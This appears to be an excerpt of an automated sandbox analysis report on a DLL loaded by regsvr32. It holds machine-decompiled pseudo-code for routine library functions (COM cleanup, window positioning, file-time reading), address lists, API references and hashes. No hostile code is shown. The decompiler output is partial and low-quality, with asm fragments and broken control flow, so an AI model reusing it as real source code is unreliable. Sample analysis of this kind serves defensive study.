                                                                                                            0x100190bc
                                                                                                            0x100190c1
                                                                                                            0x100190c3
                                                                                                            0x100190c5
                                                                                                            0x100190cb
                                                                                                            0x100190cb
                                                                                                            0x100190ce
                                                                                                            0x100190d1
                                                                                                            0x100190d1
                                                                                                            0x100190d1
                                                                                                            0x100190d4
                                                                                                            0x00000000
                                                                                                            0x10019083
                                                                                                            0x00000000
                                                                                                            0x100190d4
                                                                                                            0x10019086
                                                                                                            0x100190d6
                                                                                                            0x100190d9
                                                                                                            0x100190d9
                                                                                                            0x100190df
                                                                                                            0x100190df
                                                                                                            0x00000000
                                                                                                            0x10018eef
                                                                                                            0x10004e3a
                                                                                                            0x10004e3b
                                                                                                            0x10004e3d
                                                                                                            0x10004e47
                                                                                                            0x10004e4e
                                                                                                            0x10004e53
                                                                                                            0x10004e54
                                                                                                            0x10004e55
                                                                                                            0x10004e57
                                                                                                            0x10004e61
                                                                                                            0x10004e68
                                                                                                            0x10004e6d
                                                                                                            0x10004e6e
                                                                                                            0x10004e71
                                                                                                            0x10004e7b
                                                                                                            0x10004e82
                                                                                                            0x10004e87
                                                                                                            0x10004e88
                                                                                                            0x10004e8f
                                                                                                            0x10004e9e
                                                                                                            0x10004ea0
                                                                                                            0x10004ea3
                                                                                                            0x10004ea7
                                                                                                            0x10004eaa
                                                                                                            0x10004eac
                                                                                                            0x10004eac
                                                                                                            0x10004eb6
                                                                                                            0x10004eb6
                                                                                                            0x10018ecd
                                                                                                            0x10018ecd
                                                                                                            0x00000000
                                                                                                            0x10018ecd
                                                                                                            0x10018ecb
                                                                                                            0x10018df2

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 10018DBD
                                                                                                            • CoTaskMemAlloc.OLE32(?,?), ref: 10018EDB
                                                                                                            • _memset.LIBCMT ref: 10018EFD
                                                                                                            • CoTaskMemFree.OLE32(?), ref: 100190D9
                                                                                                              • Part of subcall function 10004D4A: _malloc.LIBCMT ref: 10004D64
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Task$AllocFreeH_prolog3_malloc_memset
                                                                                                            • String ID:
                                                                                                            • API String ID: 2459298410-0
                                                                                                            • Opcode ID: b121ae2c8e829696b65b9efb5c59cf0f74438459b6ac44388d9d562fa2d0b33e
                                                                                                            • Instruction ID: a1cdd10b8d3f28a5117ac55e09806983a961173fe6bfd8d1acb233a2e2c4c6df
                                                                                                            • Opcode Fuzzy Hash: b121ae2c8e829696b65b9efb5c59cf0f74438459b6ac44388d9d562fa2d0b33e
                                                                                                            • Instruction Fuzzy Hash: C9C106B4600709EFCB15CF68C88499AB7F5FF88704B20891AF956CF291DB71EA85CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10019C50 Relevance: 6.2, APIs: 4, Instructions: 186COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 70%
                                                                                                            			E10019C50(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t83;
				intOrPtr* _t84;
				intOrPtr _t85;
				intOrPtr* _t86;
				intOrPtr _t101;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t145;
				intOrPtr* _t151;
				intOrPtr* _t160;
				intOrPtr _t161;
				intOrPtr _t162;
				void* _t163;
				void* _t164;
				intOrPtr _t166;
				intOrPtr* _t167;
				void* _t168;
				intOrPtr _t180;

				_push(0x10);
				E1001FBC4(E100345BC, __ebx, __edi, __esi);
				_t166 = __ecx;
				 *((intOrPtr*)(_t168 - 0x1c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x1003892c;
				 *(_t168 - 4) = 0;
				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
					L11:
					while( *((intOrPtr*)(_t166 + 0x24)) != 0) {
						_t160 =  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x1c)) + 8));
						__eflags = _t160;
						if(_t160 == 0) {
							break;
						}
						_t151 =  *_t160;
						__eflags = _t151;
						if(_t151 == 0) {
							break;
						}
						 *((intOrPtr*)( *_t151 + 0xbc))( *((intOrPtr*)(_t160 + 8)), 0);
						 *((intOrPtr*)( *_t160 + 0x98)) = 0;
					}
					 *((intOrPtr*)(_t168 - 0x18)) = _t166 + 0x18;
					E1001B823(_t166 + 0x18);
					if( *((intOrPtr*)(_t166 + 0x40)) == 0) {
						L19:
						_t83 =  *((intOrPtr*)(_t166 + 8));
						if(_t83 != 0) {
							 *((intOrPtr*)( *_t83 + 8))(_t83);
						}
						_t84 =  *((intOrPtr*)(_t166 + 0xc));
						if(_t84 != 0) {
							 *((intOrPtr*)( *_t84 + 8))(_t84);
						}
						if( *((intOrPtr*)(_t166 + 0x14)) == 0) {
							L32:
							_t85 =  *((intOrPtr*)(_t166 + 0x34));
							if(_t85 != 0) {
								__imp__CoTaskMemFree(_t85);
							}
							_t136 =  *((intOrPtr*)(_t166 + 0x54));
							if( *((intOrPtr*)(_t166 + 0x54)) != 0) {
								E10018664(_t136,  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x50)))));
								E10014682( *((intOrPtr*)(_t166 + 0x54)));
							}
							_t161 =  *((intOrPtr*)(_t166 + 0x54));
							_t192 = _t161;
							if(_t161 != 0) {
								E10014682(_t161);
								_push(_t161);
								E10004D75(0, _t161, _t166, _t192);
							}
							_t162 =  *((intOrPtr*)(_t166 + 0x50));
							_t193 = _t162;
							if(_t162 != 0) {
								E10019A2F(_t162, _t193);
								_push(_t162);
								E10004D75(0, _t162, _t166, _t193);
							}
							_t86 =  *((intOrPtr*)(_t166 + 0x4c));
							if(_t86 != 0) {
								 *((intOrPtr*)( *_t86 + 8))(_t86);
							}
							_t167 =  *((intOrPtr*)(_t166 + 0x48));
							if(_t167 != 0) {
								 *((intOrPtr*)( *_t167 + 8))(_t167);
							}
							 *(_t168 - 4) =  *(_t168 - 4) | 0xffffffff;
							return E1001FC9C(E1001B91E( *((intOrPtr*)(_t168 - 0x18))));
						} else {
							 *((intOrPtr*)(_t168 - 0x10)) = 0;
							if( *((intOrPtr*)(_t166 + 0x10)) <= 0) {
								L31:
								__imp__CoTaskMemFree( *((intOrPtr*)(_t166 + 0x14)));
								goto L32;
							}
							_t163 = 0;
							do {
								_t101 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x14)) + _t163 + 0x24)) + 4));
								 *((intOrPtr*)(_t168 - 0x14)) = _t101;
								if(_t101 == 0) {
									goto L28;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((intOrPtr*)( *((intOrPtr*)(E1000911A(_t168 - 0x14))) + 0x98)) = 0;
								} while ( *((intOrPtr*)(_t168 - 0x14)) != 0);
								L28:
								E1001B823( *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x14)) + _t163 + 0x24)));
								_t145 =  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x14)) + _t163 + 0x24));
								if(_t145 != 0) {
									 *((intOrPtr*)( *_t145 + 4))(1);
								}
								 *((intOrPtr*)(_t168 - 0x10)) =  *((intOrPtr*)(_t168 - 0x10)) + 1;
								_t163 = _t163 + 0x28;
							} while ( *((intOrPtr*)(_t168 - 0x10)) <  *((intOrPtr*)(_t166 + 0x10)));
							goto L31;
						}
					}
					_t164 = 0;
					if( *((intOrPtr*)(_t166 + 0x38)) <= 0) {
						L17:
						if(_t180 != 0) {
							_push( *((intOrPtr*)(_t166 + 0x3c)));
							E10004D75(0, _t164, _t166, _t180);
							_push( *((intOrPtr*)(_t166 + 0x40)));
							E10004D75(0, _t164, _t166, _t180);
						}
						goto L19;
					}
					 *((intOrPtr*)(_t168 - 0x10)) = 0;
					do {
						__imp__#9( *((intOrPtr*)(_t166 + 0x40)) +  *((intOrPtr*)(_t168 - 0x10)));
						 *((intOrPtr*)(_t168 - 0x10)) =  *((intOrPtr*)(_t168 - 0x10)) + 0x10;
						_t164 = _t164 + 1;
					} while (_t164 <  *((intOrPtr*)(_t166 + 0x38)));
					_t180 =  *((intOrPtr*)(_t166 + 0x38));
					goto L17;
				}
				_t121 =  *((intOrPtr*)(__ecx + 0x50));
				if(_t121 == 0) {
					goto L11;
				}
				_t122 =  *_t121;
				_push(_t168 - 0x14);
				_push(0x1003b37c);
				_push(_t122);
				if( *((intOrPtr*)( *_t122))() < 0) {
					goto L11;
				}
				_t124 =  *((intOrPtr*)(_t168 - 0x14));
				if(_t124 == 0) {
					goto L11;
				}
				_push(_t168 - 0x10);
				_push(0x1003b4bc);
				 *((intOrPtr*)(_t168 - 0x10)) = 0;
				_push(_t124);
				if( *((intOrPtr*)( *_t124 + 0x10))() >= 0) {
					_t128 =  *((intOrPtr*)(_t168 - 0x10));
					if(_t128 != 0) {
						 *((intOrPtr*)( *_t128 + 0x18))(_t128,  *((intOrPtr*)(__ecx + 0x58)));
						_t130 =  *((intOrPtr*)(_t168 - 0x10));
						 *((intOrPtr*)( *_t130 + 8))(_t130);
					}
				}
				_t126 =  *((intOrPtr*)(_t168 - 0x14));
				 *((intOrPtr*)( *_t126 + 8))(_t126);
				goto L11;
			}

























                                                                                                            0x10019c50
                                                                                                            0x10019c57
                                                                                                            0x10019c5c
                                                                                                            0x10019c5e
                                                                                                            0x10019c61
                                                                                                            0x10019c6c
                                                                                                            0x10019c6f
                                                                                                            0x00000000
                                                                                                            0x10019cf5
                                                                                                            0x10019cd4
                                                                                                            0x10019cd7
                                                                                                            0x10019cd9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019cdb
                                                                                                            0x10019cdd
                                                                                                            0x10019cdf
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019ce7
                                                                                                            0x10019cef
                                                                                                            0x10019cef
                                                                                                            0x10019cfd
                                                                                                            0x10019d00
                                                                                                            0x10019d08
                                                                                                            0x10019d42
                                                                                                            0x10019d42
                                                                                                            0x10019d47
                                                                                                            0x10019d4c
                                                                                                            0x10019d4c
                                                                                                            0x10019d4f
                                                                                                            0x10019d54
                                                                                                            0x10019d59
                                                                                                            0x10019d59
                                                                                                            0x10019d5f
                                                                                                            0x10019dce
                                                                                                            0x10019dce
                                                                                                            0x10019dd3
                                                                                                            0x10019dd6
                                                                                                            0x10019dd6
                                                                                                            0x10019ddc
                                                                                                            0x10019de1
                                                                                                            0x10019de8
                                                                                                            0x10019df0
                                                                                                            0x10019df0
                                                                                                            0x10019df5
                                                                                                            0x10019df8
                                                                                                            0x10019dfa
                                                                                                            0x10019dfe
                                                                                                            0x10019e03
                                                                                                            0x10019e04
                                                                                                            0x10019e09
                                                                                                            0x10019e0a
                                                                                                            0x10019e0d
                                                                                                            0x10019e0f
                                                                                                            0x10019e13
                                                                                                            0x10019e18
                                                                                                            0x10019e19
                                                                                                            0x10019e1e
                                                                                                            0x10019e1f
                                                                                                            0x10019e24
                                                                                                            0x10019e29
                                                                                                            0x10019e29
                                                                                                            0x10019e2c
                                                                                                            0x10019e31
                                                                                                            0x10019e36
                                                                                                            0x10019e36
                                                                                                            0x10019e3c
                                                                                                            0x10019e4a
                                                                                                            0x10019d61
                                                                                                            0x10019d64
                                                                                                            0x10019d67
                                                                                                            0x10019dc5
                                                                                                            0x10019dc8
                                                                                                            0x00000000
                                                                                                            0x10019dc8
                                                                                                            0x10019d69
                                                                                                            0x10019d6b
                                                                                                            0x10019d72
                                                                                                            0x10019d77
                                                                                                            0x10019d7a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019d7c
                                                                                                            0x10019d7c
                                                                                                            0x10019d91
                                                                                                            0x10019d91
                                                                                                            0x10019d99
                                                                                                            0x10019da0
                                                                                                            0x10019da8
                                                                                                            0x10019dae
                                                                                                            0x10019db4
                                                                                                            0x10019db4
                                                                                                            0x10019db7
                                                                                                            0x10019dbd
                                                                                                            0x10019dc0
                                                                                                            0x00000000
                                                                                                            0x10019d6b
                                                                                                            0x10019d5f
                                                                                                            0x10019d0a
                                                                                                            0x10019d0f
                                                                                                            0x10019d2e
                                                                                                            0x10019d2e
                                                                                                            0x10019d30
                                                                                                            0x10019d33
                                                                                                            0x10019d38
                                                                                                            0x10019d3b
                                                                                                            0x10019d41
                                                                                                            0x00000000
                                                                                                            0x10019d2e
                                                                                                            0x10019d11
                                                                                                            0x10019d14
                                                                                                            0x10019d1b
                                                                                                            0x10019d21
                                                                                                            0x10019d25
                                                                                                            0x10019d26
                                                                                                            0x10019d2b
                                                                                                            0x00000000
                                                                                                            0x10019d2b
                                                                                                            0x10019c75
                                                                                                            0x10019c7a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019c7c
                                                                                                            0x10019c83
                                                                                                            0x10019c84
                                                                                                            0x10019c89
                                                                                                            0x10019c8e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019c90
                                                                                                            0x10019c95
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019c9a
                                                                                                            0x10019c9b
                                                                                                            0x10019ca0
                                                                                                            0x10019ca5
                                                                                                            0x10019cab
                                                                                                            0x10019cad
                                                                                                            0x10019cb2
                                                                                                            0x10019cba
                                                                                                            0x10019cbd
                                                                                                            0x10019cc3
                                                                                                            0x10019cc3
                                                                                                            0x10019cb2
                                                                                                            0x10019cc6
                                                                                                            0x10019ccc
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 10019C57
                                                                                                            • VariantClear.OLEAUT32(?), ref: 10019D1B
                                                                                                            • CoTaskMemFree.OLE32(?,00000010), ref: 10019DC8
                                                                                                            • CoTaskMemFree.OLE32(?,00000010), ref: 10019DD6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeTask$ClearH_prolog3Variant
                                                                                                            • String ID:
                                                                                                            • API String ID: 365290523-0
                                                                                                            • Opcode ID: cd38f89cae56ad47c5dcbd5386d246e758d2adde0798c45e4cdf38565e7e9628
                                                                                                            • Instruction ID: f4ca11870bf7736933ae268dd06283376a7c22ef50caea19de43a80b2043cb75
                                                                                                            • Opcode Fuzzy Hash: cd38f89cae56ad47c5dcbd5386d246e758d2adde0798c45e4cdf38565e7e9628
                                                                                                            • Instruction Fuzzy Hash: C6711475A00A42DFCB60CFA8C9C586AB7F6FF48304762486DE5469BA61CB31FD81CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001987A Relevance: 6.2, APIs: 4, Instructions: 173windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 34%
                                                                                                            			E1001987A(signed int __ecx, void* __edx) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				signed int _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				char _v76;
				intOrPtr _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t63;
				signed int _t64;
				intOrPtr _t70;
				signed int _t72;
				signed int _t73;
				signed int _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t84;
				signed int _t86;
				signed int _t88;
				signed int _t92;
				intOrPtr* _t99;
				signed int _t100;
				signed int _t126;
				intOrPtr _t127;
				void* _t144;
				void* _t147;
				intOrPtr* _t148;
				signed int** _t150;
				signed int* _t151;
				signed int _t154;
				signed int _t156;
				void* _t158;
				void* _t161;

				_t144 = __edx;
				_t126 = __ecx;
				_t158 = _t161;
				_t154 = __ecx;
				_t63 =  *((intOrPtr*)(__ecx + 4));
				_push(_t147);
				if(_t63 != 0) {
					_t64 =  *(_t63 + 0x28);
					__eflags = _t64;
					if(_t64 == 0) {
						goto L4;
					} else {
						_t126 = _t64;
						_t72 = E1000BBDF(0, _t126, _t147);
						__eflags = _t72;
						_v8 = _t72;
						if(_t72 == 0) {
							goto L4;
						} else {
							_t73 = IsWindowVisible( *(_t72 + 0x20));
							asm("sbb eax, eax");
							_t75 =  ~_t73 + 1;
							__eflags = _t75;
							_v24 = _t75;
							if(_t75 != 0) {
								GetWindowRect( *(E1000A8F0(0, _t126, _t158, GetDesktopWindow()) + 0x20),  &_v56);
								GetWindowRect( *(_v8 + 0x20),  &_v40);
								asm("cdq");
								asm("cdq");
								__eflags = _v56.right - _v56.left - _t144;
								E1000EF54(_v8, _v56.right - _v56.left - _t144 >> 1, _v56.bottom - _v56.top - _t144 >> 1, 0, 0, 0);
								E1000EF92(_v8, 1);
							}
							_t77 =  *((intOrPtr*)( *((intOrPtr*)(_t154 + 4)) + 0x50));
							_t148 = _t154 + 0x48;
							_t78 =  *((intOrPtr*)( *_t77))(_t77, 0x100388c0, _t148);
							__eflags = _t78;
							if(_t78 < 0) {
								_t80 =  *((intOrPtr*)( *((intOrPtr*)(_t154 + 4)) + 0x50));
								_t81 =  *((intOrPtr*)( *_t80))(_t80, 0x10038918,  &_v16);
								__eflags = _t81;
								if(_t81 >= 0) {
									_t82 = _v16;
									 *((intOrPtr*)( *_t82 + 0x14))(_t82,  &_v20);
									_t84 = _v16;
									 *((intOrPtr*)( *_t84 + 8))(_t84);
									_t86 = _v20;
									__eflags = _t86;
									if(_t86 != 0) {
										_t150 = _t154 + 8;
										_v12 =  *((intOrPtr*)( *_t86))(_t86, 0x1003b17c, _t150);
										_t88 = _v20;
										 *((intOrPtr*)( *_t88 + 8))(_t88);
										_t81 = _v12;
										__eflags = _t81;
										if(__eflags >= 0) {
											_t151 =  *_t150;
											 *( *_t151)(_t151, 0x1003b16c, _t154 + 0xc);
											goto L21;
										}
									} else {
										_t81 = 0x80004005;
									}
								}
							} else {
								_t99 =  *_t148;
								_t151 = _t154 + 0x4c;
								_t100 =  *((intOrPtr*)( *_t99 + 0xc))(_t99, 0, 0x1003b40c, _t151);
								__eflags =  *_t151;
								_v12 = _t100;
								if( *_t151 == 0) {
									_v12 = 0x80004003;
								}
								__eflags = _v12;
								if(__eflags >= 0) {
									L21:
									_t92 = E10018DA4(0, _t154, _t151, _t154, __eflags);
									__eflags = _v24;
									_t156 = _t92;
									if(_v24 != 0) {
										__eflags = _v40.right - _v40.left;
										E1000EF54(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
										E1000EF92(_v8, 0);
									}
									_t81 = _t156;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										__eflags = _v40.right - _v40.left;
										E1000EF54(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
										E1000EF92(_v8, 0);
									}
									_t81 = _v12;
								}
							}
							return _t81;
						}
					}
				} else {
					L4:
					_push(_t158);
					_push(_t126);
					_v76 = 0x10044410;
					E100209E8( &_v76, 0x1003e2dc);
					asm("int3");
					_push(4);
					E1001FBC4(E10032E9B, 0, _t147, _t154);
					_t127 = E100105C8(0x104);
					_v88 = _t127;
					_t70 = 0;
					_v76 = 0;
					if(_t127 != 0) {
						_t70 = E1000E58E(_t127);
					}
					return E1001FC9C(_t70);
				}
			}












































                                                                                                            0x1001987a
                                                                                                            0x1001987a
                                                                                                            0x1001987b
                                                                                                            0x10019882
                                                                                                            0x10019884
                                                                                                            0x1001988b
                                                                                                            0x1001988c
                                                                                                            0x10019893
                                                                                                            0x10019896
                                                                                                            0x10019898
                                                                                                            0x00000000
                                                                                                            0x1001989a
                                                                                                            0x1001989a
                                                                                                            0x1001989c
                                                                                                            0x100198a1
                                                                                                            0x100198a3
                                                                                                            0x100198a6
                                                                                                            0x00000000
                                                                                                            0x100198a8
                                                                                                            0x100198ab
                                                                                                            0x100198b3
                                                                                                            0x100198b5
                                                                                                            0x100198b5
                                                                                                            0x100198b6
                                                                                                            0x100198b9
                                                                                                            0x100198d4
                                                                                                            0x100198e0
                                                                                                            0x100198eb
                                                                                                            0x100198fa
                                                                                                            0x100198fb
                                                                                                            0x10019900
                                                                                                            0x1001990a
                                                                                                            0x1001990a
                                                                                                            0x10019912
                                                                                                            0x10019917
                                                                                                            0x10019921
                                                                                                            0x10019923
                                                                                                            0x10019925
                                                                                                            0x10019986
                                                                                                            0x10019995
                                                                                                            0x10019997
                                                                                                            0x10019999
                                                                                                            0x1001999f
                                                                                                            0x100199a9
                                                                                                            0x100199ac
                                                                                                            0x100199b2
                                                                                                            0x100199b5
                                                                                                            0x100199b8
                                                                                                            0x100199ba
                                                                                                            0x100199c5
                                                                                                            0x100199d1
                                                                                                            0x100199d4
                                                                                                            0x100199da
                                                                                                            0x100199dd
                                                                                                            0x100199e0
                                                                                                            0x100199e2
                                                                                                            0x100199e4
                                                                                                            0x100199f2
                                                                                                            0x00000000
                                                                                                            0x100199f2
                                                                                                            0x100199bc
                                                                                                            0x100199bc
                                                                                                            0x100199bc
                                                                                                            0x100199ba
                                                                                                            0x10019927
                                                                                                            0x10019927
                                                                                                            0x1001992b
                                                                                                            0x10019936
                                                                                                            0x10019939
                                                                                                            0x1001993b
                                                                                                            0x1001993e
                                                                                                            0x10019940
                                                                                                            0x10019940
                                                                                                            0x10019947
                                                                                                            0x1001994a
                                                                                                            0x100199f4
                                                                                                            0x100199f6
                                                                                                            0x100199fb
                                                                                                            0x100199fe
                                                                                                            0x10019a00
                                                                                                            0x10019a10
                                                                                                            0x10019a1a
                                                                                                            0x10019a23
                                                                                                            0x10019a23
                                                                                                            0x10019a28
                                                                                                            0x10019950
                                                                                                            0x10019950
                                                                                                            0x10019953
                                                                                                            0x10019963
                                                                                                            0x1001996d
                                                                                                            0x10019976
                                                                                                            0x10019976
                                                                                                            0x1001997b
                                                                                                            0x1001997b
                                                                                                            0x1001994a
                                                                                                            0x10019a2e
                                                                                                            0x10019a2e
                                                                                                            0x100198a6
                                                                                                            0x1001988e
                                                                                                            0x1001988e
                                                                                                            0x10004e6e
                                                                                                            0x10004e71
                                                                                                            0x10004e7b
                                                                                                            0x10004e82
                                                                                                            0x10004e87
                                                                                                            0x10004e88
                                                                                                            0x10004e8f
                                                                                                            0x10004e9e
                                                                                                            0x10004ea0
                                                                                                            0x10004ea3
                                                                                                            0x10004ea7
                                                                                                            0x10004eaa
                                                                                                            0x10004eac
                                                                                                            0x10004eac
                                                                                                            0x10004eb6
                                                                                                            0x10004eb6

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Rect$DesktopVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 1055025324-0
                                                                                                            • Opcode ID: ef76f55fcefd2cae7d74b9455366248ca8dbe27d5b7ca6cb76258884cb09bc7f
                                                                                                            • Instruction ID: 8de48d2105652726057613f2335e895d96fc1fae9d5598094c6c5e62d9502a62
                                                                                                            • Opcode Fuzzy Hash: ef76f55fcefd2cae7d74b9455366248ca8dbe27d5b7ca6cb76258884cb09bc7f
                                                                                                            • Instruction Fuzzy Hash: F751F975A0010AAFDB04DFA8CD84CAEB7B9FF49344B114468F605EB265DB30EE41CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001C6EB Relevance: 6.1, APIs: 4, Instructions: 132timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1001C6EB(void* __ecx, void* __eflags, signed int* _a4) {
				char _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				char _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t52;
				long _t56;
				signed int* _t75;
				signed int* _t78;
				signed int* _t81;
				struct _FILETIME* _t88;
				void* _t100;
				CHAR* _t101;
				signed int* _t102;
				void* _t103;
				void* _t107;

				_t85 = __ecx;
				_t102 = _a4;
				_t100 = __ecx;
				E10020F40(__ecx, _t102, 0, 0x128);
				E10004EB7(0, _t85, _t100, _t102, _t103,  &(_t102[8]), 0x104,  *(_t100 + 0xc), 0xffffffff);
				_t52 =  *(_t100 + 4);
				_t107 = _t52 -  *0x100384f0; // 0xffffffff
				if(_t107 == 0) {
					L21:
					return 1;
				}
				_t88 =  &_v12;
				if(GetFileTime(_t52, _t88,  &_v20,  &_v28) != 0) {
					_t56 = GetFileSize( *(_t100 + 4), 0);
					_t102[6] = _t56;
					_t102[7] = 0;
					if(_t56 != 0xffffffff || 0 != 0) {
						_t101 =  *(_t100 + 0xc);
						if( *((intOrPtr*)(_t101 - 0xc)) != 0) {
							_t102[8] = (_t88 & 0xffffff00 | GetFileAttributesA(_t101) == 0xffffffff) - 0x00000001 & _t57;
						} else {
							_t102[8] = 0;
						}
						if(E1001C573( &_v12) == 0) {
							 *_t102 = 0;
							_t102[1] = 0;
						} else {
							_t81 = E1001C68D( &_v36,  &_v12, 0xffffffff);
							 *_t102 =  *_t81;
							_t102[1] = _t81[1];
						}
						if(E1001C573( &_v20) == 0) {
							_t102[4] = 0;
							_t102[5] = 0;
						} else {
							_t78 = E1001C68D( &_v36,  &_v20, 0xffffffff);
							_t102[4] =  *_t78;
							_t102[5] = _t78[1];
						}
						if(E1001C573( &_v28) == 0) {
							_t102[2] = 0;
							_t102[3] = 0;
						} else {
							_t75 = E1001C68D( &_v36,  &_v28, 0xffffffff);
							_t102[2] =  *_t75;
							_t102[3] = _t75[1];
						}
						if(( *_t102 | _t102[1]) == 0) {
							 *_t102 = _t102[2];
							_t102[1] = _t102[3];
						}
						if((_t102[4] | _t102[5]) == 0) {
							_t102[4] = _t102[2];
							_t102[5] = _t102[3];
						}
						goto L21;
					} else {
						goto L2;
					}
				}
				L2:
				return 0;
			}






















                                                                                                            0x1001c6eb
                                                                                                            0x1001c6f3
                                                                                                            0x1001c700
                                                                                                            0x1001c702
                                                                                                            0x1001c715
                                                                                                            0x1001c71a
                                                                                                            0x1001c720
                                                                                                            0x1001c726
